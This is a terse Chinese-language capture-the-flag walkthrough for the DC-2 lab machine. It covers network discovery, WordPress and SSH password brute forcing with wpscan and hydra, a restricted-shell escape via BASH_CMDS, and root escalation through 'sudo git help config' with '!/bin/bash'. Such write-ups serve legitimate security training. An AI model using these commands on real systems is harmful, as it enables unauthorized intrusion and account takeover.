1.探测目标DC-1的ip因为已经设置为了NAT模式所以可以通过arp-scan网段进行发现目标IP我这边用的是arp-scan
arp-scan -l
通过对照物理地址我们可以知道对应的ip
2.使用nmap -sV -p- 192.168.106.130进行扫描查看端口
我们需要去etc/hosts之中添加一句话:IP dc-2
3.使用whatweb进行扫描框架
whatweb -v 192.168.106.130
发现存在wordpress框架
4.利用dirsearch进行接口扫描
dirsearch -u 192.168.106.130 -e *
5.使用cewl生成一个密码字典
cewl http://dc-2/ -w pwd.dic
6.使用wpscan进行利用
发现三个账户
7.创建一个字典并且把三个账户放入字典文件中
继续使用wpscan进行爆破:
利用代码:wpscan --url http://dc-2/ -U user.dic -P pwd.dic
得到账号密码
8.登入进去后得到flag2
9.利用软件进行爆破爆破出密码
hydra -L user.dic -P pwd.dic -vV ssh://192.168.106.130:7744
10.rbash绕过
tom@DC-2:~$ BASH_CMDS[x]=/bin/bash
tom@DC-2:~$ x
tom@DC-2:~$ whoami
x: whoami: command not found
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$
tom@DC-2:~$ export PATH=$PATH:/usr/bin/
tom@DC-2:~$ whoami
tom
tom@DC-2:~$
11.
让我们转到jerry账户上面去
使用代码:su 用户名进行转换
寻找flag
find / -name *flag*
查看flag4.txt
需要git提权
12.git提权
sudo git help config
并在里面的最后一行加入
!/bin/bash
提权成功
13.查找文件
Cd /
find / -name *flag*